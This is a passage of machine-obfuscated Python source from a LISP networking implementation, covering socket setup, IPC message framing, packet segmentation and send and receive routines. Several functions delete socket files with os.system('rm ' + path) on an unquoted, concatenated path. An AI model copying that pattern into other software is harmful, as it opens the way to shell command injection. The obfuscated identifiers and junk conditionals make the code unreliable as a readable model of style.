iiO0ooooOooo = lisp_address ( socket . ntohs ( i1I1iiiI ) , "" , 0 , 0 )
packet = iiO0ooooOooo . unpack_address ( packet )
if ( packet == None ) : return ( i1o0o0oOO )
iiO0ooooOooo . mask_len = iiO0ooooOooo . host_mask_len ( )
self . rtr_list . append ( iiO0ooooOooo )
if 12 - 12: OoOoOO00 / I1Ii111 . O0 . IiII - OOooOOo - OoO0O00
return ( i1o0o0oOO )
if 28 - 28: II111iiii . OoOoOO00 - o0oOOo0O0Ooo
if 89 - 89: I1Ii111 * OoooooooOO . OOooOOo . I11i % i11iIiiIii
if 8 - 8: I1ii11iIi11i + II111iiii . OoO0O00 + I1IiiI - II111iiii % OoO0O00
class lisp_nat_info ( object ) :
def __init__ ( self , addr_str , hostname , port ) :
self . address = addr_str
self . hostname = hostname
self . port = port
self . uptime = lisp_get_timestamp ( )
if 85 - 85: i11iIiiIii % iII111i + II111iiii
if 16 - 16: ooOoO0o * OoOoOO00 / OoOoOO00 + II111iiii
def timed_out ( self ) :
i1i111Iiiiiii = time . time ( ) - self . uptime
return ( i1i111Iiiiiii >= ( LISP_INFO_INTERVAL * 2 ) )
if 50 - 50: OoO0O00 / OOooOOo % I1IiiI / Ii1I + OoO0O00 . iIii1I11I1II1
if 62 - 62: I1Ii111 + OoooooooOO - Ii1I - iIii1I11I1II1
if 80 - 80: OoO0O00
class lisp_info_source ( object ) :
def __init__ ( self , hostname , addr_str , port ) :
self . address = lisp_address ( LISP_AFI_IPV4 , addr_str , 32 , 0 )
self . port = port
self . uptime = lisp_get_timestamp ( )
self . nonce = None
self . hostname = hostname
self . no_timeout = False
if 72 - 72: II111iiii % i11iIiiIii + OoOoOO00 / I1Ii111 - i11iIiiIii
if 39 - 39: i11iIiiIii - OOooOOo / OoO0O00 * OoOoOO00 / IiII
def cache_address_for_info_source ( self ) :
III = self . address . print_address_no_iid ( ) + self . hostname
lisp_info_sources_by_address [ III ] = self
if 84 - 84: I1ii11iIi11i . iIii1I11I1II1 / Ii1I / II111iiii
if 56 - 56: OOooOOo * iII111i / Ii1I
def cache_nonce_for_info_source ( self , nonce ) :
self . nonce = nonce
lisp_info_sources_by_nonce [ nonce ] = self
if 9 - 9: I1ii11iIi11i * i11iIiiIii / I1Ii111 + iIii1I11I1II1
if 1 - 1: OoO0O00 % iIii1I11I1II1 * OoOoOO00 / oO0o
if 73 - 73: iII111i
if 6 - 6: o0oOOo0O0Ooo + Oo0Ooo
if 45 - 45: oO0o % O0 / O0
if 98 - 98: I1Ii111
if 58 - 58: OOooOOo
if 6 - 6: I1ii11iIi11i
if 37 - 37: i11iIiiIii . II111iiii + OOooOOo + i1IIi * OOooOOo
if 18 - 18: ooOoO0o
if 18 - 18: I1Ii111 + OoOoOO00 % OOooOOo - IiII - i1IIi + I1ii11iIi11i
def lisp_concat_auth_data ( alg_id , auth1 , auth2 , auth3 , auth4 ) :
if 33 - 33: I11i * Ii1I / Oo0Ooo + oO0o % OOooOOo % OoooooooOO
if ( lisp_is_x86 ( ) ) :
if ( auth1 != "" ) : auth1 = byte_swap_64 ( auth1 )
if ( auth2 != "" ) : auth2 = byte_swap_64 ( auth2 )
if ( auth3 != "" ) :
if ( alg_id == LISP_SHA_1_96_ALG_ID ) : auth3 = socket . ntohl ( auth3 )
else : auth3 = byte_swap_64 ( auth3 )
if 29 - 29: Ii1I . II111iiii / I1Ii111
if ( auth4 != "" ) : auth4 = byte_swap_64 ( auth4 )
if 79 - 79: IiII . OoOoOO00 / oO0o % OoO0O00 / Ii1I + I11i
if 78 - 78: o0oOOo0O0Ooo + I1Ii111 % i11iIiiIii % I1IiiI - Ii1I
if ( alg_id == LISP_SHA_1_96_ALG_ID ) :
auth1 = lisp_hex_string ( auth1 )
auth1 = auth1 . zfill ( 16 )
auth2 = lisp_hex_string ( auth2 )
auth2 = auth2 . zfill ( 16 )
auth3 = lisp_hex_string ( auth3 )
auth3 = auth3 . zfill ( 8 )
IIiI = auth1 + auth2 + auth3
if 81 - 81: i11iIiiIii - II111iiii + I11i
if ( alg_id == LISP_SHA_256_128_ALG_ID ) :
auth1 = lisp_hex_string ( auth1 )
auth1 = auth1 . zfill ( 16 )
auth2 = lisp_hex_string ( auth2 )
auth2 = auth2 . zfill ( 16 )
auth3 = lisp_hex_string ( auth3 )
auth3 = auth3 . zfill ( 16 )
auth4 = lisp_hex_string ( auth4 )
auth4 = auth4 . zfill ( 16 )
IIiI = auth1 + auth2 + auth3 + auth4
if 52 - 52: II111iiii
return ( IIiI )
if 62 - 62: iII111i / OoO0O00 + i11iIiiIii / Oo0Ooo
if 26 - 26: I1ii11iIi11i - OoO0O00
if 19 - 19: iIii1I11I1II1 / I1ii11iIi11i + O0
if 12 - 12: I11i . OOooOOo + o0oOOo0O0Ooo . OoO0O00 + o0oOOo0O0Ooo
if 56 - 56: i1IIi / i1IIi . OoO0O00 % i1IIi - OoOoOO00 % OOooOOo
if 66 - 66: i11iIiiIii * IiII % IiII . I1IiiI / ooOoO0o
if 50 - 50: IiII . iII111i / o0oOOo0O0Ooo % OoOoOO00 * IiII % I11i
if 15 - 15: Ii1I
if 29 - 29: I11i / I1IiiI / OoooooooOO . OoOoOO00 / I11i . I1Ii111
if 69 - 69: O0 * OoOoOO00 + o0oOOo0O0Ooo + I1IiiI % iII111i . OoooooooOO
def lisp_open_listen_socket ( local_addr , port ) :
if ( port . isdigit ( ) ) :
if ( local_addr . find ( "." ) != - 1 ) :
I1IIIII = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
if 48 - 48: II111iiii / OoOoOO00
if ( local_addr . find ( ":" ) != - 1 ) :
if ( lisp_is_raspbian ( ) ) : return ( None )
I1IIIII = socket . socket ( socket . AF_INET6 , socket . SOCK_DGRAM )
if 30 - 30: II111iiii
I1IIIII . bind ( ( local_addr , int ( port ) ) )
else :
ooO0o = port
if ( os . path . exists ( ooO0o ) ) :
os . system ( "rm " + ooO0o )
time . sleep ( 1 )
if 12 - 12: I11i * OOooOOo - ooOoO0o / I1Ii111
I1IIIII = socket . socket ( socket . AF_UNIX , socket . SOCK_DGRAM )
I1IIIII . bind ( ooO0o )
if 70 - 70: OOooOOo + ooOoO0o / I1ii11iIi11i * IiII / i11iIiiIii - OoooooooOO
return ( I1IIIII )
if 28 - 28: II111iiii / OoO0O00 - I1IiiI % IiII . OoO0O00 * iII111i
if 14 - 14: I1Ii111
if 87 - 87: I1Ii111
if 47 - 47: II111iiii + I1IiiI . Oo0Ooo / iIii1I11I1II1
if 14 - 14: i1IIi / OoO0O00 / iII111i % I1Ii111
if 72 - 72: OoO0O00 . II111iiii - IiII + IiII + iIii1I11I1II1 % oO0o
if 21 - 21: iII111i + OoOoOO00 - i11iIiiIii % O0 + OOooOOo
def lisp_open_send_socket ( internal_name , afi ) :
if ( internal_name == "" ) :
if ( afi == LISP_AFI_IPV4 ) :
I1IIIII = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
if 30 - 30: o0oOOo0O0Ooo - Oo0Ooo + iII111i / O0
if ( afi == LISP_AFI_IPV6 ) :
if ( lisp_is_raspbian ( ) ) : return ( None )
I1IIIII = socket . socket ( socket . AF_INET6 , socket . SOCK_DGRAM )
if 94 - 94: IiII
else :
if ( os . path . exists ( internal_name ) ) : os . system ( "rm " + internal_name )
I1IIIII = socket . socket ( socket . AF_UNIX , socket . SOCK_DGRAM )
I1IIIII . bind ( internal_name )
if 69 - 69: I1Ii111 . I1Ii111
return ( I1IIIII )
if 53 - 53: i11iIiiIii + iII111i * Oo0Ooo - I1Ii111
if 61 - 61: o0oOOo0O0Ooo / OOooOOo . II111iiii - I1IiiI * i11iIiiIii
if 8 - 8: iII111i % o0oOOo0O0Ooo
if 87 - 87: Ii1I % I11i / I1Ii111
if 21 - 21: OoO0O00 + Ii1I / I1Ii111
if 75 - 75: I1Ii111 . Ii1I % iIii1I11I1II1 / OoOoOO00
if 38 - 38: i1IIi
def lisp_close_socket ( sock , internal_name ) :
sock . close ( )
if ( os . path . exists ( internal_name ) ) : os . system ( "rm " + internal_name )
return
if 1 - 1: I1ii11iIi11i + OoO0O00 % I11i . OOooOOo + i1IIi / oO0o
if 35 - 35: ooOoO0o % OoOoOO00 % OoO0O00 + OOooOOo / IiII * OoOoOO00
if 65 - 65: I1IiiI . Oo0Ooo + i1IIi - Ii1I * i1IIi
if 64 - 64: I1IiiI / OoO0O00 * I1IiiI * II111iiii . Ii1I
if 98 - 98: I1Ii111 + o0oOOo0O0Ooo
if 73 - 73: I1ii11iIi11i / I1Ii111 + i11iIiiIii + OoO0O00 . ooOoO0o
if 54 - 54: I1ii11iIi11i + IiII - oO0o + Oo0Ooo / IiII % Oo0Ooo
if 2 - 2: OOooOOo / I11i * I11i + I11i / O0 - OOooOOo
def lisp_is_running ( node ) :
return ( True if ( os . path . exists ( node ) ) else False )
if 29 - 29: OoOoOO00 + i11iIiiIii % OoO0O00 - OoooooooOO
if 68 - 68: iII111i / OOooOOo
if 28 - 28: II111iiii
if 49 - 49: I1ii11iIi11i
if 33 - 33: iIii1I11I1II1
if 72 - 72: I1ii11iIi11i * i11iIiiIii
if 12 - 12: O0 - iIii1I11I1II1 % Oo0Ooo / O0 - IiII
if 55 - 55: OOooOOo . Oo0Ooo * OoOoOO00 / OoooooooOO * i11iIiiIii + oO0o
if 45 - 45: Ii1I
if 8 - 8: oO0o + OOooOOo
if 37 - 37: IiII - OoOoOO00 + oO0o - Oo0Ooo + IiII
def lisp_packet_ipc ( packet , source , sport ) :
IiIii1iIIII = "packet@{}@{}@{}@" . format ( str ( len ( packet ) ) , source , str ( sport ) )
return ( IiIii1iIIII . encode ( ) + packet )
if 33 - 33: Oo0Ooo % oO0o - I1IiiI + Oo0Ooo
if 90 - 90: I1ii11iIi11i * I1Ii111 - iIii1I11I1II1 % IiII * I1Ii111 . I1Ii111
if 90 - 90: o0oOOo0O0Ooo - O0 % O0 - oO0o . OoooooooOO
if 30 - 30: I11i + O0 / Ii1I / OoOoOO00 - oO0o + II111iiii
if 21 - 21: iIii1I11I1II1 % OoooooooOO * OOooOOo % i1IIi
if 73 - 73: OoooooooOO
if 100 - 100: I11i / i1IIi / i1IIi % Ii1I - II111iiii . OoooooooOO
if 72 - 72: Oo0Ooo * OoooooooOO % I1IiiI + I11i - II111iiii
if 82 - 82: iIii1I11I1II1 / i1IIi * I1IiiI . i11iIiiIii
if 56 - 56: Ii1I * I1IiiI / ooOoO0o * II111iiii
def lisp_control_packet_ipc ( packet , source , dest , dport ) :
IiIii1iIIII = "control-packet@{}@{}@" . format ( dest , str ( dport ) )
return ( IiIii1iIIII . encode ( ) + packet )
if 51 - 51: i1IIi . oO0o % OOooOOo
if 90 - 90: OoooooooOO + iII111i / iIii1I11I1II1
if 12 - 12: OoooooooOO
if 9 - 9: O0 / O0 / I1IiiI - oO0o . ooOoO0o
if 6 - 6: O0 - OoO0O00 + OoooooooOO % iIii1I11I1II1
if 58 - 58: i11iIiiIii * OOooOOo . Oo0Ooo / iII111i - i1IIi
if 45 - 45: Ii1I
if 89 - 89: ooOoO0o + I11i * O0 % OoOoOO00
if 2 - 2: I1Ii111 % iIii1I11I1II1 . Ii1I - II111iiii
def lisp_data_packet_ipc ( packet , source ) :
IiIii1iIIII = "data-packet@{}@{}@@" . format ( str ( len ( packet ) ) , source )
return ( IiIii1iIIII . encode ( ) + packet )
if 33 - 33: I11i . i11iIiiIii % i1IIi * II111iiii * i11iIiiIii + OoOoOO00
if 26 - 26: I1IiiI % OoOoOO00 % I11i + Oo0Ooo
if 86 - 86: iII111i / i1IIi % Oo0Ooo
if 84 - 84: o0oOOo0O0Ooo * OOooOOo . I11i * Ii1I
if 32 - 32: ooOoO0o % ooOoO0o * I1ii11iIi11i % Ii1I + Oo0Ooo . OoOoOO00
if 2 - 2: I1Ii111 / ooOoO0o * oO0o + IiII
if 14 - 14: OoOoOO00 / iIii1I11I1II1 . o0oOOo0O0Ooo % i11iIiiIii . OoOoOO00
if 92 - 92: OoO0O00 . i1IIi
if 22 - 22: Ii1I . I1IiiI
if 54 - 54: OOooOOo / I1ii11iIi11i % oO0o
if 66 - 66: I11i + iII111i
def lisp_command_ipc ( ipc , source ) :
Oo00oo = "command@{}@{}@@" . format ( len ( ipc ) , source ) + ipc
return ( Oo00oo . encode ( ) )
if 50 - 50: IiII
if 33 - 33: OOooOOo % I1IiiI - I1IiiI / IiII
if 22 - 22: ooOoO0o * ooOoO0o % o0oOOo0O0Ooo * Ii1I . OoO0O00
if 55 - 55: OoOoOO00 - I1ii11iIi11i + iIii1I11I1II1 - i11iIiiIii / i1IIi / II111iiii
if 37 - 37: Ii1I + o0oOOo0O0Ooo
if 74 - 74: Oo0Ooo / O0 + i1IIi . I1IiiI + OoO0O00 / Oo0Ooo
if 13 - 13: o0oOOo0O0Ooo / Ii1I . II111iiii
if 8 - 8: I11i - I11i % IiII
if 8 - 8: I1IiiI . IiII * O0 * o0oOOo0O0Ooo
if 17 - 17: I1IiiI . oO0o + Oo0Ooo + I11i / o0oOOo0O0Ooo
if 25 - 25: iII111i / iII111i % OoOoOO00 / ooOoO0o
def lisp_api_ipc ( source , data ) :
Oo00oo = "api@" + str ( len ( data ) ) + "@" + source + "@@" + data
return ( Oo00oo . encode ( ) )
if 81 - 81: OOooOOo * oO0o
if 32 - 32: Oo0Ooo * OoO0O00 + ooOoO0o . O0 * oO0o * iIii1I11I1II1
if 50 - 50: i1IIi
if 53 - 53: II111iiii + O0 . ooOoO0o * IiII + i1IIi
if 80 - 80: Ii1I + O0
if 59 - 59: i11iIiiIii - OoooooooOO % I11i . OoO0O00 - Oo0Ooo * o0oOOo0O0Ooo
if 7 - 7: II111iiii % Ii1I * i11iIiiIii
if 28 - 28: II111iiii / ooOoO0o * i11iIiiIii % OOooOOo
if 18 - 18: I11i - IiII - iIii1I11I1II1
if 82 - 82: II111iiii + OoO0O00 % iIii1I11I1II1 / O0
if 75 - 75: OOooOOo * OoO0O00 + OoooooooOO + i11iIiiIii . OoO0O00
if 94 - 94: I11i * ooOoO0o . I1IiiI / Ii1I - I1IiiI % OoooooooOO
def lisp_ipc ( packet , send_socket , node ) :
if 32 - 32: OoO0O00
if 22 - 22: II111iiii . I11i
if 61 - 61: OOooOOo % O0 . I1ii11iIi11i . iIii1I11I1II1 * I11i
if 29 - 29: ooOoO0o + i1IIi % IiII * Ii1I
if ( lisp_is_running ( node ) == False ) :
lprint ( "Suppress sending IPC to {}" . format ( node ) )
return
if 94 - 94: OOooOOo / IiII
if 18 - 18: IiII - I11i / Ii1I % IiII * i1IIi
iIIII1ii = 1500 if ( packet . find ( b"control-packet" ) == - 1 ) else 9000
if 92 - 92: II111iiii / I11i + O0
oo00 = 0
i1iIii = len ( packet )
I11O00OOo0o0o0oo = 0
iiiIIiIIi1 = .001
while ( i1iIii > 0 ) :
I11I = min ( i1iIii , iIIII1ii )
O0o000 = packet [ oo00 : I11I + oo00 ]
if 56 - 56: OoOoOO00 % I1ii11iIi11i . oO0o * OoooooooOO + OoooooooOO * Ii1I
try :
if ( type ( O0o000 ) == str ) : O0o000 = O0o000 . encode ( )
send_socket . sendto ( O0o000 , node )
lprint ( "Send IPC {}-out-of-{} byte to {} succeeded" . format ( len ( O0o000 ) , len ( packet ) , node ) )
if 73 - 73: ooOoO0o . OoO0O00 % I1ii11iIi11i - oO0o
I11O00OOo0o0o0oo = 0
iiiIIiIIi1 = .001
if 67 - 67: o0oOOo0O0Ooo . I11i + i1IIi
except socket . error as oO0ooOOO :
if ( I11O00OOo0o0o0oo == 12 ) :
lprint ( "Giving up on {}, consider it down" . format ( node ) )
break
if 100 - 100: Oo0Ooo - I1IiiI . OOooOOo % iIii1I11I1II1 . I11i
if 83 - 83: OoOoOO00 * iII111i
lprint ( "Send IPC {}-out-of-{} byte to {} failed: {}" . format ( len ( O0o000 ) , len ( packet ) , node , oO0ooOOO ) )
if 75 - 75: i11iIiiIii . o0oOOo0O0Ooo / oO0o . OoO0O00 % Ii1I % Ii1I
if 94 - 94: iII111i . Ii1I
I11O00OOo0o0o0oo += 1
time . sleep ( iiiIIiIIi1 )
if 71 - 71: o0oOOo0O0Ooo * II111iiii / OOooOOo . OoO0O00
lprint ( "Retrying after {} ms ..." . format ( iiiIIiIIi1 * 1000 ) )
iiiIIiIIi1 *= 2
continue
if 73 - 73: I1Ii111 * OoO0O00 / OoOoOO00 . II111iiii
if 87 - 87: OoO0O00 + Oo0Ooo + O0 % OoooooooOO - iIii1I11I1II1
oo00 += I11I
i1iIii -= I11I
if 100 - 100: Oo0Ooo + IiII
return
if 81 - 81: iIii1I11I1II1 + iIii1I11I1II1
if 19 - 19: ooOoO0o + i1IIi / Oo0Ooo * II111iiii * I1Ii111 / ooOoO0o
if 23 - 23: I1Ii111
if 76 - 76: Ii1I + Ii1I / i1IIi % o0oOOo0O0Ooo . iIii1I11I1II1 . OoOoOO00
if 75 - 75: I11i . Ii1I / I1ii11iIi11i
if 99 - 99: Ii1I
if 85 - 85: I1Ii111 + I1Ii111 + OoOoOO00 / ooOoO0o / o0oOOo0O0Ooo . Oo0Ooo
if 41 - 41: i1IIi % Ii1I . i1IIi * OoooooooOO % Ii1I
def lisp_format_packet ( packet ) :
packet = binascii . hexlify ( packet )
oo00 = 0
I11Ii1I1I1111 = b""
i1iIii = len ( packet ) * 2
while ( oo00 < i1iIii ) :
I11Ii1I1I1111 += packet [ oo00 : oo00 + 8 ] + b" "
oo00 += 8
i1iIii -= 4
if 21 - 21: iII111i
return ( I11Ii1I1I1111 . decode ( ) )
if 72 - 72: I11i % o0oOOo0O0Ooo . iIii1I11I1II1 - I1Ii111 / i11iIiiIii
if 75 - 75: OoooooooOO
if 24 - 24: oO0o % iII111i - II111iiii / Ii1I + O0
if 37 - 37: I1Ii111 - i1IIi / iIii1I11I1II1
if 53 - 53: Ii1I - iIii1I11I1II1 % I1ii11iIi11i * i11iIiiIii + ooOoO0o
if 63 - 63: Oo0Ooo * I1IiiI
if 84 - 84: Oo0Ooo
def lisp_send ( lisp_sockets , dest , port , packet ) :
OOoo = lisp_sockets [ 0 ] if dest . is_ipv4 ( ) else lisp_sockets [ 1 ]
if 33 - 33: OoOoOO00 - ooOoO0o - o0oOOo0O0Ooo - i1IIi + I11i
if 14 - 14: iII111i / oO0o . oO0o - OOooOOo * i1IIi - i1IIi
if 70 - 70: OoooooooOO
if 60 - 60: OOooOOo - Ii1I * Ii1I
if 69 - 69: i11iIiiIii . IiII + o0oOOo0O0Ooo % Ii1I - OoO0O00
if 46 - 46: OoOoOO00 + iII111i * o0oOOo0O0Ooo - I1ii11iIi11i / oO0o + IiII
if 1 - 1: iIii1I11I1II1 / OoooooooOO + Oo0Ooo . Ii1I
if 25 - 25: I1ii11iIi11i / i1IIi * oO0o - II111iiii * i1IIi
if 57 - 57: OoO0O00 % OoO0O00
if 67 - 67: O0 . i11iIiiIii + iIii1I11I1II1
if 86 - 86: iIii1I11I1II1
if 81 - 81: OOooOOo / I11i / OoooooooOO
I1IIIi = dest . print_address_no_iid ( )
if ( I1IIIi . find ( "::ffff:" ) != - 1 and I1IIIi . count ( "." ) == 3 ) :
if ( lisp_i_am_rtr ) : OOoo = lisp_sockets [ 0 ]
if ( OOoo == None ) :
OOoo = lisp_sockets [ 0 ]
I1IIIi = I1IIIi . split ( "::ffff:" ) [ - 1 ]
if 74 - 74: I11i + OoooooooOO % II111iiii % o0oOOo0O0Ooo
if 27 - 27: OoO0O00 * Oo0Ooo
if 80 - 80: i11iIiiIii . OoO0O00 - I11i % I11i
lprint ( "{} {} bytes {} {}, packet: {}" . format ( bold ( "Send" , False ) ,
len ( packet ) , bold ( "to " + I1IIIi , False ) , port ,
lisp_format_packet ( packet ) ) )
if 21 - 21: I1IiiI . OoO0O00 * IiII % OoooooooOO - Oo0Ooo + Oo0Ooo
if 94 - 94: ooOoO0o
if 80 - 80: i11iIiiIii - O0 / I1Ii111 + OOooOOo % Oo0Ooo
if 95 - 95: II111iiii
OO00oOo0oO = ( LISP_RLOC_PROBE_TTL == 128 )
if ( OO00oOo0oO ) :
o00o0ooO0oo = struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ]
OO00oOo0oO = ( o00o0ooO0oo in [ 0x12 , 0x28 ] )
if ( OO00oOo0oO ) : lisp_set_ttl ( OOoo , LISP_RLOC_PROBE_TTL )
if 55 - 55: OoO0O00 % I1Ii111 - i1IIi - i1IIi + i11iIiiIii / iII111i
if 51 - 51: Oo0Ooo - O0 % o0oOOo0O0Ooo / I1ii11iIi11i
try : OOoo . sendto ( packet , ( I1IIIi , port ) )
except socket . error as oO0ooOOO :
lprint ( "socket.sendto() failed: {}" . format ( oO0ooOOO ) )
if 60 - 60: iII111i / OoooooooOO * II111iiii * Oo0Ooo * o0oOOo0O0Ooo
if 60 - 60: iII111i . OOooOOo
if 39 - 39: O0 - i11iIiiIii - I1IiiI / Oo0Ooo - i11iIiiIii
if 30 - 30: OoO0O00 / OoOoOO00 + I1ii11iIi11i % IiII - OoO0O00
if 19 - 19: I1IiiI
if ( OO00oOo0oO ) : lisp_set_ttl ( OOoo , 64 )
return
if 99 - 99: OOooOOo - OOooOOo
if 98 - 98: o0oOOo0O0Ooo + O0 * oO0o - i11iIiiIii
if 83 - 83: o0oOOo0O0Ooo
if 23 - 23: o0oOOo0O0Ooo . I11i
if 67 - 67: iII111i
if 52 - 52: IiII . OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / IiII . OoooooooOO . Oo0Ooo / ooOoO0o + O0
if 38 - 38: I11i
def lisp_receive_segments ( lisp_socket , packet , source , total_length ) :
if 66 - 66: II111iiii
if 57 - 57: OoO0O00 / Oo0Ooo % I1IiiI * I1ii11iIi11i
if 68 - 68: iII111i - o0oOOo0O0Ooo - OoO0O00 . O0 - i11iIiiIii
if 2 - 2: I1ii11iIi11i * i1IIi
if 17 - 17: I1ii11iIi11i * Ii1I % Oo0Ooo * I1Ii111 + OoO0O00 . OoooooooOO
I11I = total_length - len ( packet )
if ( I11I == 0 ) : return ( [ True , packet ] )
if 60 - 60: Ii1I . II111iiii
lprint ( "Received {}-out-of-{} byte segment from {}" . format ( len ( packet ) ,
total_length , source ) )
if 36 - 36: IiII . iII111i * O0 . i1IIi * O0 * I1Ii111
if 50 - 50: OoooooooOO + o0oOOo0O0Ooo + iIii1I11I1II1 + OOooOOo
if 90 - 90: Ii1I * I11i % I1Ii111 - I1ii11iIi11i * I1Ii111 % OoO0O00
if 50 - 50: iIii1I11I1II1
if 56 - 56: oO0o
i1iIii = I11I
while ( i1iIii > 0 ) :
try : O0o000 = lisp_socket . recvfrom ( 9000 )
except : return ( [ False , None ] )
if 55 - 55: iIii1I11I1II1 % oO0o % OOooOOo / I1Ii111 * OoooooooOO / Oo0Ooo
O0o000 = O0o000 [ 0 ]
if 88 - 88: I11i + OoO0O00 . iIii1I11I1II1 . II111iiii
if 67 - 67: OOooOOo - ooOoO0o % iII111i % IiII
if 71 - 71: OoO0O00 - ooOoO0o - I1IiiI + O0
if 15 - 15: i1IIi
if 43 - 43: II111iiii + OOooOOo . i11iIiiIii - II111iiii
oOIi1IiIii1iII = O0o000 . decode ( )
if ( oOIi1IiIii1iII . find ( "packet@" ) == 0 ) :
oOIi1IiIii1iII = oOIi1IiIii1iII . split ( "@" )
lprint ( "Received new message ({}-out-of-{}) while receiving " + "fragments, old message discarded" , len ( O0o000 ) ,
# iII111i % i11iIiiIii * OOooOOo % I1IiiI + OoO0O00
oOIi1IiIii1iII [ 1 ] if len ( oOIi1IiIii1iII ) > 2 else "?" )
return ( [ False , O0o000 ] )
if 56 - 56: I1Ii111 - OOooOOo + iIii1I11I1II1 + O0 * iIii1I11I1II1
if 62 - 62: oO0o
i1iIii -= len ( O0o000 )
packet += O0o000
if 46 - 46: I1Ii111 - iII111i / oO0o % OoO0O00 / O0 + oO0o
lprint ( "Received {}-out-of-{} byte segment from {}" . format ( len ( O0o000 ) , total_length , source ) )
if 35 - 35: Oo0Ooo
if 86 - 86: ooOoO0o . OoO0O00
return ( [ True , packet ] )
if 47 - 47: IiII % I1IiiI
if 91 - 91: Ii1I
if 69 - 69: iII111i
if 96 - 96: Ii1I
if 39 - 39: OoO0O00 - I1IiiI % II111iiii - IiII * I1ii11iIi11i
if 64 - 64: OOooOOo + Oo0Ooo . OoOoOO00 . OOooOOo + i11iIiiIii
if 7 - 7: ooOoO0o * I11i / iIii1I11I1II1
if 15 - 15: OoooooooOO / iII111i
if 40 - 40: o0oOOo0O0Ooo
def lisp_bit_stuff ( payload ) :
lprint ( "Bit-stuffing, found {} segments" . format ( len ( payload ) ) )
Oo00oo = b""
for O0o000 in payload : Oo00oo += O0o000 + b"\x40"
return ( Oo00oo [ : - 1 ] )
if 75 - 75: oO0o - OoOoOO00 * ooOoO0o . O0
if 78 - 78: Oo0Ooo
if 74 - 74: O0 / I11i
if 52 - 52: I1IiiI + oO0o * II111iiii
if 15 - 15: I11i
if 72 - 72: O0
if 15 - 15: II111iiii / I11i % II111iiii % Ii1I % i11iIiiIii / I1Ii111
if 93 - 93: OOooOOo / OoooooooOO % iII111i
if 47 - 47: o0oOOo0O0Ooo - I1IiiI % O0 % I1Ii111 . O0 . OoOoOO00
if 95 - 95: o0oOOo0O0Ooo * OOooOOo - iII111i * OoooooooOO - ooOoO0o / I1IiiI
if 47 - 47: OoO0O00 % I1IiiI / OoOoOO00 - I1Ii111 / I1IiiI
if 13 - 13: o0oOOo0O0Ooo % ooOoO0o
if 15 - 15: iII111i * I1IiiI . iIii1I11I1II1 % I1IiiI / O0
if 47 - 47: OoooooooOO - i11iIiiIii . I1IiiI / i1IIi
if 74 - 74: OoooooooOO * ooOoO0o
if 45 - 45: Oo0Ooo + iIii1I11I1II1 . o0oOOo0O0Ooo
if 50 - 50: o0oOOo0O0Ooo % O0
if 67 - 67: OoOoOO00
if 21 - 21: I11i % Oo0Ooo + Oo0Ooo / iIii1I11I1II1 % iIii1I11I1II1
if 66 - 66: iII111i
def lisp_receive ( lisp_socket , internal ) :
while ( True ) :
if 72 - 72: ooOoO0o / oO0o / iII111i . I1Ii111 . I1ii11iIi11i + IiII
if 39 - 39: I1IiiI % I1Ii111
if 22 - 22: OoOoOO00 - OOooOOo % i1IIi + i1IIi
if 28 - 28: oO0o + OoOoOO00 * Ii1I . I11i
try : oOO0O = lisp_socket . recvfrom ( 9000 )
except : return ( [ "" , "" , "" , "" ] )
if 36 - 36: O0 + o0oOOo0O0Ooo - OoOoOO00 * OoO0O00
if 95 - 95: iIii1I11I1II1 % I1ii11iIi11i + II111iiii + ooOoO0o + iIii1I11I1II1 / I1Ii111
if 59 - 59: I1Ii111
if 22 - 22: OoooooooOO
if 88 - 88: I1Ii111 - OoO0O00
if 29 - 29: I1IiiI . I1Ii111
if ( internal == False ) :
Oo00oo = oOO0O [ 0 ]
O0oo0OoO0oo = lisp_convert_6to4 ( oOO0O [ 1 ] [ 0 ] )
ooO0 = oOO0O [ 1 ] [ 1 ]
if 74 - 74: Oo0Ooo / OoOoOO00 + OoOoOO00 % i11iIiiIii . OoO0O00 + ooOoO0o
if ( ooO0 == LISP_DATA_PORT ) :
o0I11 = lisp_data_plane_logging
IIiI11I1II1 = lisp_format_packet ( Oo00oo [ 0 : 60 ] ) + " ..."
else :
o0I11 = True
IIiI11I1II1 = lisp_format_packet ( Oo00oo )
if 77 - 77: II111iiii
if 80 - 80: i11iIiiIii / Ii1I / ooOoO0o - OoO0O00
if ( o0I11 ) :
lprint ( "{} {} bytes {} {}, packet: {}" . format ( bold ( "Receive" ,
False ) , len ( Oo00oo ) , bold ( "from " + O0oo0OoO0oo , False ) , ooO0 ,
IIiI11I1II1 ) )
if 17 - 17: OoO0O00 * i11iIiiIii * Oo0Ooo / OoooooooOO / II111iiii
return ( [ "packet" , O0oo0OoO0oo , ooO0 , Oo00oo ] )
if 92 - 92: iII111i + II111iiii
if 88 - 88: o0oOOo0O0Ooo . IiII / O0 + ooOoO0o
if 19 - 19: Oo0Ooo
if 24 - 24: Ii1I . I1ii11iIi11i . i1IIi % Oo0Ooo
if 63 - 63: OoO0O00 . I1IiiI + ooOoO0o + I1ii11iIi11i
if 63 - 63: OoooooooOO * OoOoOO00 - Ii1I
oo0OOOOOOOo0 = False
iiooo0o0oO = oOO0O [ 0 ]
if ( type ( iiooo0o0oO ) == str ) : iiooo0o0oO = iiooo0o0oO . encode ( )
iiiIIi1I1I1 = False
if 18 - 18: OoooooooOO * i11iIiiIii - iII111i % IiII . i11iIiiIii
while ( oo0OOOOOOOo0 == False ) :
iiooo0o0oO = iiooo0o0oO . split ( b"@" )
if 8 - 8: I1IiiI . ooOoO0o
if ( len ( iiooo0o0oO ) < 4 ) :
lprint ( "Possible fragment (length {}), from old message, " + "discarding" , len ( iiooo0o0oO [ 0 ] ) )
if 31 - 31: ooOoO0o / OoOoOO00
iiiIIi1I1I1 = True
break
if 16 - 16: ooOoO0o
if 61 - 61: IiII
oO0000o00OO = iiooo0o0oO [ 0 ] . decode ( )
try :
II1IIII = int ( iiooo0o0oO [ 1 ] )
except :
iIIiiiii1iIII = bold ( "Internal packet reassembly error" , False )
lprint ( "{}: {}" . format ( iIIiiiii1iIII , oOO0O ) )
iiiIIi1I1I1 = True
break
if 99 - 99: oO0o * OOooOOo + Oo0Ooo % OoO0O00 * Ii1I / OoOoOO00
O0oo0OoO0oo = iiooo0o0oO [ 2 ] . decode ( )
ooO0 = iiooo0o0oO [ 3 ] . decode ( )
if 1 - 1: I1IiiI
if 68 - 68: ooOoO0o
if 68 - 68: I11i % IiII
if 1 - 1: I1IiiI + OOooOOo - OOooOOo * O0 + o0oOOo0O0Ooo * OOooOOo
